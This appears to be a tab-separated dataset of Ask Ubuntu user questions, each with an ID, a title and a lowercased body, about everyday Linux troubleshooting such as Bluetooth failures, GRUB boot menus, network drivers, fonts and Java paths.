427712	is my chromium browser up to date ?	i have chromium-browser installed from the default ubuntu repositories . when interrogated , it claims to be version 32 . # chromium-browser -- version chromium 32.0.1700.107 ubuntu 13.10 is this chromium up to date ? it may seem obvious that software installed from the repositories will remain up-to-date as long as the system is updated . however , chromium-browser comes from the universe repository which is maintained by the community . # apt-cache show chromium-browser package : chromium-browser priority : optional section : universe/web installed-size : 142499 maintainer : ubuntu developers < ubuntu-devel-discuss @ lists.ubuntu.com > original-maintainer : micah gersten < micahg @ ubuntu.com > , fabien tassin < fta @ ubuntu.com > architecture : amd64 version : 32.0.1700.107-0ubuntu0.13.10.1~20140204.972.1 is chromium actually maintained ? the chromium project does n't have any stable versions but google 's chrome seems to be on version 33 already .
427713	set default japanese font	i 'm trying to set the default japanese font . a while back my default font was ukai but after installing new fonts it changes to something else . i would like to get ukai back as the default japanese font without having to uninstall all other fonts . ~/.fonts.conf has a note saying to modify ~/fontconfig/fonts.conf and i used the template on the arch wiki ( https : //wiki.archlinux.org/index.php/fonts # font_alias ) to set my font to ukai : < ? xml version= '' 1.0 '' ? > < ! doctype fontconfig system `` fonts.dtd '' > < fontconfig > < alias > < family > sans-serif < /family > < prefer > < family > droid < /family > < family > ar pl ukai cn < /family > < /prefer > < /alias > < /fontconfig > ... and it does n't do anything . it seems to be reading the file , e.g . if i break the xml file it will complain ( `` unmatched tags '' , `` ca n't have two `` , etc ... ) . when i start conky i also get the warning `` fontconfig warning : `` /etc/fonts/conf.d/50-user.conf '' , line 14 : reading configurations from ~/.fonts.conf is deprecated . `` , which is odd because that file was created by font-manager ... the string for the font `` ar pl ukai cn '' is in several files under /etc/fonts/conf.avail , so it seems to be installed correctly . i 'm using openbox with lubuntu 13.10 x64 . p.s . : what i 'm asking is very similar to the question : how do i change the default chinese font ? , but the method does not seem to work anymore ( fontconfig complains it 's deprecated ) .
427714	how do i allow connections through my external ip in iptables ?	let 's say i have an internal address of 192.168.0.2 and an external address of 1.222.333.4 my external ip should , by default , be mapped to my internal ip . but how should i allow connections into my external ip with an iptables rule ? i have no interface set up for the outfacing network , should i create a dhcp outfacing network card ( how would i go about doing this , if this is the case ? ) or should i do it another way ? - maybe with a forward rule ? i am not sure . i imagine it would be easier to make an outfacing network card . thank you
427715	find all .htaccess files that contain a particular string ?	how would i find all the .htaccess files ( recursively from current folder ) that contain a particular string ( 'common.php ' ) in my case ? what would be the command to do so ?
427721	trying to run a lan web development server and a mine craft server at the same time	i want to run a web server on an old vista box . removed the vita and installed linux . my 16 year old daughter would like a web development computer and my ten year old would like to have a minecraft server . both would be local area only . max of 4 people ever on period . most likely only one on the web server and maybe 3 at best on minecraft server . was considering just turning off the web server to run minecraft and turning off the mc server for the web dev . i 'm pretty sure this is n't an issue of resources . i 'm just not sure how the ip addressing would work . that would be all the system would be doing oldest girl bought herself a gaming pc and out went this computer to dads shop . system specs : intel ( r ) pentium ( r ) dual cpu e2200 @ 2.20ghz : 1203.00mhz 3 gb ram and if i remember right 240 gb of hdd space
427722	batch convert .rar terminal	i need to batch convert a bunch of .rar files to .zip files in a folder . i do not need to extract them they are comics help in .rar form and i want to convert them to .zip so they can be used in calibre .
427724	ubuntu 12.04 sound dumy output after updates	i had not installed any updates to ubuntu 12.04 lts since september 2013 . today , i just updated all recommendations from the update manager . my audio was working fine and now it is not working at all . i does n't detect my audio hardware . when i go into `` sound settings '' , i see only a dummy output device . i have tried suggestions from several forums with no success : such as this link also , the output from these commands is as follows : [ ~ ] $ cat /proc/asound/cards cat : /proc/asound/cards : no such file or directory [ ~ ] $ lspci | grep -i audio 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 )
427725	is 32 or 64 bit better for a computer with 2 gb memory ?	this is the computer i have currently with xubuntu 13.10 installed on it , and it works well : os version : microsoft windows xp professional , service pack 3 , 32 bit processor : intel ( r ) pentium ( r ) 4 cpu 2.80 ghz , x86 family 15 model 4 stepping 1 processor count : 1 ram : 1149 mb graphics card : intel ( r ) 82865g graphics controller , 96 mb hard drives : c : total - 38091 mb , free - 17316 mb ; motherboard : dell computer corp. , 0u2575 antivirus : ca anti-virus plus , updated : no , on-demand scanner : enabled however , i do a lot of editing of large digital photos , and i 'm converting a second computer , with the exact same specifications as this one , to xubuntu 13.10 , and i 'm replacing the 128 mb memory module with a 1 gb module , giving me a total of 2 gb . i have read a lot of posts here that say with 2 gb it is best to go with the 32 bit download of 13.10 . but i have also read a lot of posts here that say it 's best to go with the 64-bit . that 2 gb is plenty to run 64-bit software , and that 32 bit software is rapidly becoming obsolete . what is the explanation to clear up the confusion ?
427726	problem embedding a pylab figure in a gtk application using quickly	i am currently trying to build a simple app that includes some pylab figures . i just started to use quickly and i am concerned about some import issues . that is , none of the matplotlib backends will be able to work . more specifically , if any of the following import statements is uncommented in my main file , then quickly will fail to run the app # from matplotlib.backends.backend_gtk import figurecanvasgtk as figurecanvas # from matplotlib.backends.backend_gtkagg import figurecanvasgtkagg as figurecanvas # from matplotlib.backends.backend_gtkcairo import figurecanvasgtkcairo as figurecanvas so there is no way i can embed a plot . here is the output of quickly run if the backend_gtk is uncommented /usr/lib/python2.7/dist-packages/gobject/constants.py:24 : warning : g_boxed_type_register_static : assertion `g_type_from_name ( name ) == 0 ' failed import gobject._gobject /usr/lib/python2.7/dist-packages/gtk-2.0/gtk/__init__.py:40 : warning : specified class size for type `pygtkgenericcellrenderer ' is smaller than the parent type 's `gtkcellrenderer ' class size from gtk import _gtk /usr/lib/python2.7/dist-packages/gtk-2.0/gtk/__init__.py:40 : warning : g_type_get_qdata : assertion `node ! = null ' failed from gtk import _gtk any idea of what could solve the problem ? do you need more information ?
427728	fix fans and network icon in ubuntu 13.10 ( gnome )	i just reinstalled my computer with ubuntu server 13.10 and gnome , i had ubuntu desktop 13.10 on the same computer before . i noticed that the fans are running a lot more now than before the reinstallation . i also noticed that the network icon indicates no connection , but i am connected to the wifi that i used during the installation . is there some more packages that i need to fix the issues above ?
427729	ca n't connect to wired or wireless network with dell d520	i recently found my old dell latitude d520 and i decided it would be a learning experience to try and dual boot ubuntu on it and play with a new operating system . i installed ubuntu but to my surprise it wo n't connect to any network , wired or not . it did n't seem to recognize any network cards at all on my laptop . now , i 'm an utter noob at linux and ubuntu and i 've got no clue how to install any types of drivers . could somebody help me here , giving me explicit instructions ? edit 1 : i downloaded ubuntu 12.04.4 . it is my assumption that no network cards are being recognized because ubuntu is telling me there are no network devices available . as well , plugging in an ethernet cord does n't seem to do anything as i still can not connect to the internet or my home network . output of ifconfig : link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:32 errors:0 dropped:0 overruns:0 frame:0 tx packets:32 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:2608 ( 2.6 kb ) tx bytes:2608 ( 2.6 kb ) edit 2 : output of lspci -nn | grep -e 0200 -e 0280 02:00.0 ethernet controller [ 0200 ] : broadcom corporation bcm4401-b0 100base-tx [ 14e4:170c ] ( rev 02 ) 0c:00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11b/g wlan [ 14e4:4311 ] ( rev 01 )
427730	failed to spawn bluetooth main process : unable to execute : permission denied	i had bluetooth working on ubuntu 13.10 , quite well in fact . however , i recently did some experimenting with qtsixa , a tool which allows syncing of playstation 3 remotes with ubuntu over bluetooth . unfortunately , while its service ( sixad ) is enabled , other bluetooth functions are disabled . i 've gotten that out of my system , but am unable to restore bluetooth functionality . notably , in dmesg , i see the following output : [ 1.492281 ] init : failed to spawn bluetooth main process : unable to execute : permission denied the bluetooth chipset is a broadcom bcm20702a0 ; here 's the output of dmesg | grep bluetooth : [ 1.175333 ] bluetooth : core ver 2.16 [ 1.175342 ] bluetooth : hci device and connection manager initialized [ 1.175347 ] bluetooth : hci socket layer initialized [ 1.175348 ] bluetooth : l2cap socket layer initialized [ 1.175351 ] bluetooth : sco socket layer initialized [ 1.504078 ] bluetooth : rfcomm tty layer initialized [ 1.504085 ] bluetooth : rfcomm socket layer initialized [ 1.504086 ] bluetooth : rfcomm ver 1.11 although frankly , the permission denied message makes me think it has nothing to do with drivers . thoughts ?
427732	deleted mail in sylfeed not in trash	i am using sylpheed as my email client in kubuntu 12.04 when i delete an unread email in the inbox , it gets placed in the trash folder . when i delete a read email in the inbox , it gets deleted without being placed in the trash folder . the manual says : `` trash : in here all your deleted messages go . '' is this a bug or have i just not been able to find the setting ?
427733	starting ubuntu from computer off will not start ethernet connection ; ok after reboot	starting ubuntu from computer off will not start the ethernet connection . it will however , start my connection on a reboot every time ; this has happened through many versions of ubuntu . this may be the same as others but i never seem to see that on a reboot the connection restarts automatically . i have tried a few things from other posts with no success . anyone knows a solution for this ?
427738	hp nc6400 wireless card not detected	brand new ubuntu user . downloaded 12.04 onto my hp nc6400 . everything looks great , except i ca n't get my wireless to work . ethernet is working fine . i 've searched everywhere , but none of the answers i 've found make sense . at the terminal i typed the command sudo lshw -c network this is the result : *-network description : ethernet interface product : netxtreme bcm5753m gigabit ethernet pci express vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:08:00.0 logical name : eth0 version : 21 serial : 00:16 : d4 : c6:14:1c size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.132 duplex=full firmware=5753m-v3.56 ip=192.168.1.114 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:47 memory : e0100000-e010ffff *-network disabled description : wireless interface product : pro/wireless 3945abg [ golan ] network connection vendor : intel corporation physical id : 0 bus info : pci @ 0000:10:00.0 logical name : wlan0 version : 02 serial : 00:19 : d2 : ab:66:1c width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwl3945 driverversion=3.11.0-17-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11abg resources : irq:45 memory : e0000000-e0000fff ``
427743	how to make okular play embedded video	so i create presentations using latex and the beamer class . this allows me to embed videos ( .mp4 , .avi , .gif ) formats in my presentation . these seem to play well in full versions of acrobat reader but these videos do not play in okular . is there something else i should do to configure okular ? is this a latex question or a ubuntu question ? ; ) code snippet to embed video in latex \documentclass [ bookmarks=true ] { beamer } \setbeamertemplate { footline } [ page number ] \setbeamercolor { structure } { bg=yellow , fg=black } \usepackage { times } \usepackage [ t1 ] { fontenc } \usepackage { movie15 } \usepackage { fourier-orns } \begin { document } \begin { frame } \frametitle { slide title here } \centering \includemovie { 6.5cm } { 6.5cm } { ./figures/video.avi } \end { frame } \end { document }
427744	virtualbox `` not installing x window system drivers '' is it hwe stack related ?	i am running 12.04 with the lts hardware enablement stacks as my virtualbox host . ( i 'm using lts-raring and virtualbox 4.2.20 . ) when setting up a new kubuntu 14.04 guest with virtual box , upon installing guest additions i saw the warning `` not installing x window system drivers '' . the kubuntu 14.04 vm runs at a very low resolution ( small window ) . how do i resolve this ? i 've gone through the usual steps for setting up the guest additions . here 's the outline : devices > install guest additions ( host+d ) sudo apt-get install build-essential gcc dkms ( and linux headers , if needed ) cd /media/ $ user/vboxadditions_4.2.20_xxxx/ sudo ./vboxlinuxadditions.run then reboot the vm i can not upgrade virtualbox because the .deb package tries to uninstall all my lts hardware enablement stack packages . i 've had this happen before and i do n't want to risk the damage to my system entailed by that . so i have to stick with vb 4.2.20 on the host . update : i just found this : http : //xpressubuntu.wordpress.com/2014/02/14/virtualbox-and-the-latest-14-04-display-stuck-at-low-resolution/ maybe this is related ?
427745	eeebuntu inexperienced user , forgot my username but i know my password how can i find it without logging in ?	i had lost this computer around the house and now that i 'm trying to get back onto it i have completely forgotten my login name
427746	bluetooth dies ( bnep0 )	i am using ubuntu 13.10 on a system 76 darter ultra thin . when i connect to the internet with my phone over bluetooth , it works for a short time , then bluetooth dies and i must reboot to use any bluetooth connections . i have android , windows and mac os devices that connect just fine with the same phone . here are the bluetoothd and bnep0 syslog entries : feb 25 17:47:12 tokarev bluetoothd [ 566 ] : adapter /org/bluez/566/hci0 has been disabled feb 25 17:47:12 tokarev bluetoothd [ 566 ] : adapter /org/bluez/566/hci0 has been enabled feb 25 17:47:12 tokarev bluetoothd [ 566 ] : hci0 : set secure simple pairing ( 0x000b ) failed : busy ( 0x0a ) feb 25 17:47:12 tokarev bluetoothd [ 566 ] : input-headset driver probe failed for device 08:60:6e:9f : ab : e2 feb 25 17:47:12 tokarev bluetoothd [ 566 ] : unknown command complete for opcode 19 feb 25 17:47:12 tokarev bluetoothd [ 566 ] : unregister path : /org/bluez/566/hci0 feb 25 17:47:12 tokarev networkmanager [ 842 ] : < info > ( a0 : ed : cd:6d:2e:48 ) : new bluetooth device ( driver : 'bluez ' ifindex : 0 ) feb 25 17:47:50 tokarev bluetoothd [ 566 ] : bnep0 connected feb 25 17:47:50 tokarev bluetoothd [ 566 ] : bnep0 connected feb 25 17:47:50 tokarev dhclient : dhcpdiscover on bnep0 to 255.255.255.255 port 67 interval 3 ( xid=0x5ede7da1 ) feb 25 17:47:50 tokarev dhclient : listening on lpf/bnep0/fc : f8 : ae:1e : cf:1b feb 25 17:47:50 tokarev dhclient : sending on lpf/bnep0/fc : f8 : ae:1e : cf:1b feb 25 17:47:50 tokarev networkmanager [ 842 ] : < info > activation ( a0 : ed : cd:6d:2e:48 bnep0/bluetooth ) stage 2 of 5 ( device configure ) successful . will connect via pan . feb 25 17:47:50 tokarev networkmanager [ 842 ] : < info > activation ( a0 : ed : cd:6d:2e:48 bnep0/bluetooth ) stage 2 of 5 ( device configure ) successful . will connect via pan . feb 25 17:47:50 tokarev networkmanager [ 842 ] : < info > activation ( bnep0 ) beginning dhcpv4 transaction ( timeout in 45 seconds ) feb 25 17:47:50 tokarev networkmanager [ 842 ] : < info > activation ( bnep0 ) beginning ip6 addrconf . feb 25 17:47:50 tokarev networkmanager [ 842 ] : < info > ( bnep0 ) : dhcpv4 state changed nbi - > preinit feb 25 17:47:50 tokarev networkmanager [ 842 ] : scplugin-ifupdown : device added ( path : /sys/devices/pci0000:00/0000:00:14.0/usb2/2-5/2-5:1.0/bluetooth/hci0/hci0:256/net/bnep0 , iface : bnep0 ) : no ifupdown configuration found . feb 25 17:47:50 tokarev networkmanager [ 842 ] : scplugin-ifupdown : device added ( path : /sys/devices/pci0000:00/0000:00:14.0/usb2/2-5/2-5:1.0/bluetooth/hci0/hci0:256/net/bnep0 , iface : bnep0 ) : no ifupdown configuration found . feb 25 17:47:50 tokarev networkmanager [ 842 ] : scplugin-ifupdown : devices added ( path : /sys/devices/pci0000:00/0000:00:14.0/usb2/2-5/2-5:1.0/bluetooth/hci0/hci0:256/net/bnep0 , iface : bnep0 ) feb 25 17:47:50 tokarev networkmanager [ 842 ] : scplugin-ifupdown : devices added ( path : /sys/devices/pci0000:00/0000:00:14.0/usb2/2-5/2-5:1.0/bluetooth/hci0/hci0:256/net/bnep0 , iface : bnep0 ) feb 25 17:47:50 tokarev networkmanager [ 842 ] : < warn > /sys/devices/pci0000:00/0000:00:14.0/usb2/2-5/2-5:1.0/bluetooth/hci0/hci0:256/net/bnep0 : could n't determine device driver ; ignoring ... feb 25 17:47:50 tokarev networkmanager [ 842 ] : < warn > /sys/devices/pci0000:00/0000:00:14.0/usb2/2-5/2-5:1.0/bluetooth/hci0/hci0:256/net/bnep0 : could n't determine device driver ; ignoring ... feb 25 17:47:51 tokarev avahi-daemon [ 666 ] : joining mdns multicast group on interface bnep0.ipv6 with address fe80 : :fef8 : aeff : fe1e : cf1b . feb 25 17:47:51 tokarev avahi-daemon [ 666 ] : new relevant interface bnep0.ipv6 for mdns . feb 25 17:47:51 tokarev avahi-daemon [ 666 ] : registering new address record for fe80 : :fef8 : aeff : fe1e : cf1b on bnep0.* . feb 25 17:47:53 tokarev avahi-daemon [ 666 ] : joining mdns multicast group on interface bnep0.ipv4 with address 172.20.10.6 . feb 25 17:47:53 tokarev avahi-daemon [ 666 ] : new relevant interface bnep0.ipv4 for mdns . feb 25 17:47:53 tokarev avahi-daemon [ 666 ] : registering new address record for 172.20.10.6 on bnep0.ipv4 . feb 25 17:47:53 tokarev dhclient : dhcpdiscover on bnep0 to 255.255.255.255 port 67 interval 8 ( xid=0x5ede7da1 ) feb 25 17:47:53 tokarev dhclient : dhcprequest of 172.20.10.6 on bnep0 to 255.255.255.255 port 67 ( xid=0x5ede7da1 ) feb 25 17:47:53 tokarev networkmanager [ 842 ] : < info > ( bnep0 ) : dhcpv4 state changed preinit - > bound feb 25 17:47:55 tokarev networkmanager [ 842 ] : < info > policy set 'missy network ' ( bnep0 ) as default for ipv4 routing and dns . feb 25 17:48:09 tokarev networkmanager [ 842 ] : < info > ( bnep0 ) : ip6 addrconf timed out or failed . feb 25 17:52:49 tokarev avahi-daemon [ 666 ] : interface bnep0.ipv4 no longer relevant for mdns . feb 25 17:52:49 tokarev avahi-daemon [ 666 ] : interface bnep0.ipv6 no longer relevant for mdns . feb 25 17:52:49 tokarev avahi-daemon [ 666 ] : leaving mdns multicast group on interface bnep0.ipv4 with address 172.20.10.6 . feb 25 17:52:49 tokarev avahi-daemon [ 666 ] : leaving mdns multicast group on interface bnep0.ipv6 with address fe80 : :fef8 : aeff : fe1e : cf1b . feb 25 17:52:49 tokarev avahi-daemon [ 666 ] : withdrawing address record for 172.20.10.6 on bnep0 . feb 25 17:52:49 tokarev avahi-daemon [ 666 ] : withdrawing address record for fe80 : :fef8 : aeff : fe1e : cf1b on bnep0 . feb 25 17:52:49 tokarev avahi-daemon [ 666 ] : withdrawing workstation service for bnep0 . feb 25 17:52:49 tokarev bluetoothd [ 566 ] : adapter /org/bluez/566/hci0 has been disabled feb 25 17:52:49 tokarev bluetoothd [ 566 ] : bnep0 disconnected feb 25 17:52:49 tokarev bluetoothd [ 566 ] : bnep0 disconnected feb 25 17:52:49 tokarev bluetoothd [ 566 ] : could not bring down bnep0 feb 25 17:52:49 tokarev bluetoothd [ 566 ] : could not bring down bnep0 feb 25 17:52:49 tokarev bluetoothd [ 566 ] : hci0 : set io capability ( 0x0018 ) failed : invalid index ( 0x11 ) feb 25 17:52:49 tokarev bluetoothd [ 566 ] : unregister path : /org/bluez/566/hci0 feb 25 17:52:49 tokarev dhclient : receive_packet failed on bnep0 : network is down feb 25 17:52:49 tokarev networkmanager [ 842 ] : < info > ( a0 : ed : cd:6d:2e:48 ) : bluetooth link disconnected . feb 25 17:52:49 tokarev networkmanager [ 842 ] : < info > ( bnep0 ) : canceled dhcp transaction , dhcp client pid 8322 feb 25 17:52:49 tokarev networkmanager [ 842 ] : scplugin-ifupdown : devices removed ( path : /sys/devices/pci0000:00/0000:00:14.0/usb2/2-5/2-5:1.0/bluetooth/hci0/hci0:256/net/bnep0 , iface : bnep0 ) feb 25 17:52:49 tokarev networkmanager [ 842 ] : scplugin-ifupdown : devices removed ( path : /sys/devices/pci0000:00/0000:00:14.0/usb2/2-5/2-5:1.0/bluetooth/hci0/hci0:256/net/bnep0 , iface : bnep0 ) feb 25 17:52:49 tokarev networkmanager [ 842 ] : < warn > sysctl : failed to open '/proc/sys/net/ipv6/conf/bnep0/accept_ra ' : ( 2 ) no such file or directory feb 25 17:52:49 tokarev networkmanager [ 842 ] : < warn > sysctl : failed to open '/proc/sys/net/ipv6/conf/bnep0/accept_ra ' : ( 2 ) no such file or directory feb 25 17:52:49 tokarev networkmanager [ 842 ] : < warn > sysctl : failed to open '/proc/sys/net/ipv6/conf/bnep0/use_tempaddr ' : ( 2 ) no such file or directory feb 25 17:52:49 tokarev networkmanager [ 842 ] : < warn > sysctl : failed to open '/proc/sys/net/ipv6/conf/bnep0/use_tempaddr ' : ( 2 ) no such file or directory
427748	how to remove grub and boot windows ?	i have tried the other suggestions such as bootrec.exe /fixboot and bootrec.exe /fixmbr but on restart it still boots to the grub command line . i have also tried startup repair using the windows 7 disk but now i am stuck . any ideas ?
427752	macbookpro delayed boot into 13.10 ubuntu	we have a 4.0gb macbook pro intel core duo cpu 8600 2.4hzx2 running ubuntu 13.10 . when powering on it displays a white screen for approx 10 seconds , prior to booting ununtu 13.10 . please take note this particular laptop has had its battery removed . i have researched andnot found any solution to this so far . more of an inconvenience than a fault , but any help on improving initial boot time would be appreciated . many thanks-
427756	sync google documents ( non `` typical '' documents )	i 'm currently using grive to sync my workspace with my google drive and it does great , except i have a question- any documents that you edit online in the actual drive do not get stored as .doc files or any other sync-able format . is there an application or patch that lets me edit the files from the drive remotely without having to save them as docs first ? i 'm using ubuntu 13.10 .
427757	wireless icon missing in 12.04	my system is running on 12.04.4 , 64 bit and the wireless icon is missing . there are no connectivity issues , but it becomes tedious to choose a different network from the network menu than the tray .
427761	create a vm in ubuntu	i am now running ubuntu but i want to create a vm using another internal hard drive with windows 7 already installed on it or just access my files that are password protected from that hard drive . i am a newbie and need help please
427768	ibus - > preferences does n't show	im trying to set my kubuntu to accept japanese input , i followed this guide https : //www.youtube.com/watch ? v=bkwgyevmsgk # t=95 i clicked ibus , but it does nothing , i cant see anything ibus on my system tray . later i did this and it fixed the issue , ibus now showing on my tray properly sudo im-config and change the input method from default to ibus . then log out and login . but whenever i right click the tray - > preferences - > it does nothing , nothing pop up on my side , it just does nothing . the other menu , ( about , restart , quit ) is working , but whenever i try to click `` preferences '' it does nothing . anyone can tell me what i missed ? thanks i 'm on : kubuntu 13.10
427770	can users passwords be cracked from etc/shadow file ?	my question is if someone hacked privileges on /etc/shadow file , can he crack the passwords of the system users . if yes , how can i secure more my passwords and how to make it difficult on a cracker to easily crack my users passwords . any suggestion ?
427771	upgrade wants to install un-needed packages	when i run apt-get upgrade it includes packages like firefox-locale-de even though i removed firefox and have run apt-get autoremove . how can i figure out why my system still wants this package ?
427772	firefox 27.0.1 address bar completion pop-up text blank	i ca n't seem to catch a screenshot , but the drop-down menu that appears when you 're typing into the address bar with suggestions seems to be broken . the icons on the left-hand side of each suggestion appear , and the rows are highlighted when i hover over , but there 's no text at all . might be a firefox bug , might have to do with the display manager ; i 'm not sure .
427773	ubuntu 12.04.4 installation does n't work	i uninstalled ubuntu 13.10 due to problems with the nvidia driver and installed ubuntu 12.04.4 and it has the same problems , but in the ubuntu 12.04.4 version i ca n't login to the session because the screen does not respond . is there any way to change the nvidia drivers in ubuntu by using a live cd , mounting the disks and changing the driver files ? or is there any other way to replace the existing nvidia driver with a different driver ? i think this is the only way to unlock the login screen . i have been using windows 7 on this desktop pc for two years without any problem and i do not use the pc for games ( special games ) . when i tried to use ubuntu 13.10 , i ran the system testing application many times in ubuntu and it did not report any graphics or memory problem , and when i run ubuntu 12.04 in live cd mode , the the system displays a message inviting me to replace the graphics driver with the proprietary nvidia driver , that 's why i am asking how to do it in live cd mode . also i ca n't login from my ubuntu installation on the hard disk because the login screen is locked . specifications : ⠀compaq presario cq5000 series ⠀amd athlon ii x3 435 processor , platform x86_64 ⠀nvidia geforce 6150se nforce graphics ⠀memory 2gb ram
427775	invoke-rc.d : unknown initscript , /etc/init.d/modemmanager not found	i booted ubuntu 13.10 in my android tablet and works good but after installing some programs i have this error u0_a206 @ android : / $ u0_a206 @ android : / $ su root @ android : / # /data/data/com . zpwebsites . linuxonandroid/files/busybox chroot /data/local/mnt /root/init.sh config file loaded new 'x ' desktop is localhost : 0 starting applications specified in /home/ubuntu/.vnc/xstartup log file is /home/ubuntu/.vnc/localhost:0.log if you see the message 'new 'x ' desktop is localhost : 0 ' then you are ready to vnc into your ubuntu os . if connection from a different machine on the same network as the android device use the address below : wlan0 : error fetching interface information : device not found if using androidvnc , change the 'color format ' setting to 24-bit colour , and once you 've vnc 'd in , change the 'input mode ' to touchpad ( in settings ) * starting openbsd secure shell server sshd [ ok ] to shut down the linux environment , just enter 'exit ' at this terminal - and wait for all shutdown routines to finish ! root @ localhost : / # root @ localhost : / # sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up modemmanager ( 0.6.0.0.really-0ubuntu7 ) ... invoke-rc.d : unknown initscript , /etc/init.d/modemmanager not found . dpkg : error processing modemmanager ( -- configure ) : subprocess installed post-installation script returned error exit status 100 errors were encountered while processing : modemmanager e : sub-process /usr/bin/dpkg returned an error code ( 1 ) root @ localhost : / # ' i ca n't install anything any update and upgrade i tryed some answers from this here and other forums but does n't work
427777	editing remote files via sshfs mount very slow ( sublime text )	i 'm trying to nail down the best way to work on projects located on a remote server . i use sublime text and i 've been experimenting with sshfs on ubuntu to mount the remote directory locally and then sync the changes across that way . unfortunately , when i open the remote files , sublime becomes extremely choppy and unresponsive ; it seems theres some sort of latency delay ( i assume due to byte syncing ) , which causes sublime to lag . does anyone know a way around this , or a superior way to edit a remote directory locally ? unfortunately i am not at liberty to install git on the remote server .
427780	malware on computer	i 'm inexperienced on computers , but am sure that some type of malware is on the computer . i went to the ubuntu site and tried to install to install protection with the suggested site of : mbam-setup.exe . i was to go thru several steps , but nothing came up . i do n't think that it was downloaded or installed . if anyone can provide any assistance , it would be greatly appreciated . thanks , jack
427784	where/how do i find the file for 'sound ' of 'system settings ' ?	i need to find the file for 'sound ' ( sound settings ) of 'systems settings ' i need to know that files command and use that command to make a separate line for 'sound ' in the 'sound and video ' section of 'main menu' i use gnome in ubuntu 12.04 lts thanks
427785	how to make grub menu for two different already installed os in two different hard drive ?	the desktop has two different hard drive ; 120gb ssd and 2tb hdd . i have ubuntu 13.04 already installed in ssd and i partitioned hdd as 500gb , 750gb and 750gb . i used 750gb partitions to store files so that 120 will be left to ubuntu only and left 500gb as unallocated space just in case . now windows 8.1 has been installed to 500gb . ssd has the priority from the bios and unless it is changed from the boot menu , windows is not able to boot . what i want to do is to make/create a grub menu so that the user of the desktop will have sometime to choose which to boot or if no choice is made , boot ubuntu . i am not able to do a clean install to any os . is there any possible way to make/create such a grub menu ? thanks in advance .
427786	banshee cpu usage > 100 %	banshee cpu usage peaks and maintains > = 100 % ( according to htop ) when i do simple , nontrivial things . even deleting files via banshee results in > = 100 % cpu usage . i have tried several sugggestions from other askubuntu questions such as disable bpm and other extensions . really , all i do is delete one song via banshee , and it takes up > = 100 % cpu usage and never stops .
427796	copy data off a possible failing hard drive	i have a second hard drive that has a partition for /home mounted on the first drive . yesterday , the booting failed because /home can not be found . i run 'blkid ' and see its uuid is gone . but when i run 'fdisk -l ' i can see the drive and the disk is shown in the gpart without partition type . i tried to manually mount it but it would n't recognize any the filesystem type . and 'dmesg|tail ' showed ca n't find ext3/ext4 and etc . i also run 'file -ls /dev/sda1 ' and it gives '/dev/sda1 : data ' . is there a way that i can access the drive or just copy the data off the drive ? thanks .
427798	desktop region is limited on xubuntu	i 'm using three display setup and xubuntu 13.10 . the useful region of desktops are limited . i ca n't place icons beyond some region in the center of the screen . please see the screenshot of my primary display : for example i ca n't move firefox icon higher than it is now . and i ca n't move phpstorm icon lower that it is now . here 's my nvidia configuration : why is that ? how to fix that ?
427801	how to clone screen with hdmi nvidia propietary drivers ?	i have a nvidia gt 220 with propietary drivers , and would want to clone screen with mi tv with a hdmi cable , but it only allows me to show another screen , do you know how to do it ? thanks .
427802	transfer all kernel logs ( var/log/messages ) to the snmp listener as snmp trap	i am working with embedded system dell dcs management sub system . currently we are using linux kernel 2.6.30 build and we have a kernel logs stored to the /var/log/messages path . now we have to transfer all this logs to the specified snmp target as a part of snmp traps . which steps have to be followed to achieve this ?
427806	how to use steadyflow and uget in ubuntu 12.04	i am using ubuntu 12.04 , and i downloaded steadyflow and uget , but i do n't know how to use these download managers . can anyone tell me how to download files using these download managers ? i prefer to use steadyflow because of its look . below is a screenshot of steadyflow download manager :
427811	whats causing the crash ( screen intact , keyboard + mouse unresponsive )	i do n't know what 's causing the crash ( keyboard & mouse not responsive , but screen intact , no blank screen ) , but once in a while my dell vostro 2520 notebook with ubuntu 12.04 used to crash almost every alternate day . now it has n't crashed for almost 3 weeks i think , but right now it crashed again . there is a list of crash possibilities here but how can i find out what type of crash is it ? kernel crash ? if so what should i be looking for in /var/log/kern.log ? i need to find out the root cause and find information on how to prevent it . ps : yesterday , the update manager did a firmware update too
427815	unable to set java path	hey i am trying to save my oracle jdk path by using following command sudo gedit /etc/environment and the i am saving path as java_home=/usr/lib/jvm/jdk1.7.0_51 path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games/usr/lib/jvm/jdk1.7.0_51/bin '' and after saving when i am using echo $ path i am unable to see my saved path . what should i do ?
427818	how can i run this sh script without typing the full path ?	i 'm still very new to ubuntu . i 'm using 12.04 , and i 'd like to know if there is a way to run this program/shell script without typing : /opt/idea/bin/idea.sh it 's kinda tedious and i 'm quite lazy . any help would be appreciated . thanks .
427820	what video editing software that can import from my dvd drive is available ?	i would like to edit video that is currently held on dvds . is there software ( for ubuntu ) that will import video held on dvd ?
427821	can i run gcm-calibrate on xubuntu without installing all of gnome ?	i 've got the colorhug and it 's got this nice livecd that runs gnome and runs through a user-friendly monitor calibration program . can i do this from xubuntu , without booting into the livecd ?
427824	how do i launch windows if i have installed ubuntu ?	i have installed ubuntu , and when i switch on pc it does n't show me a screen of choosing os . how could i make it appear ?
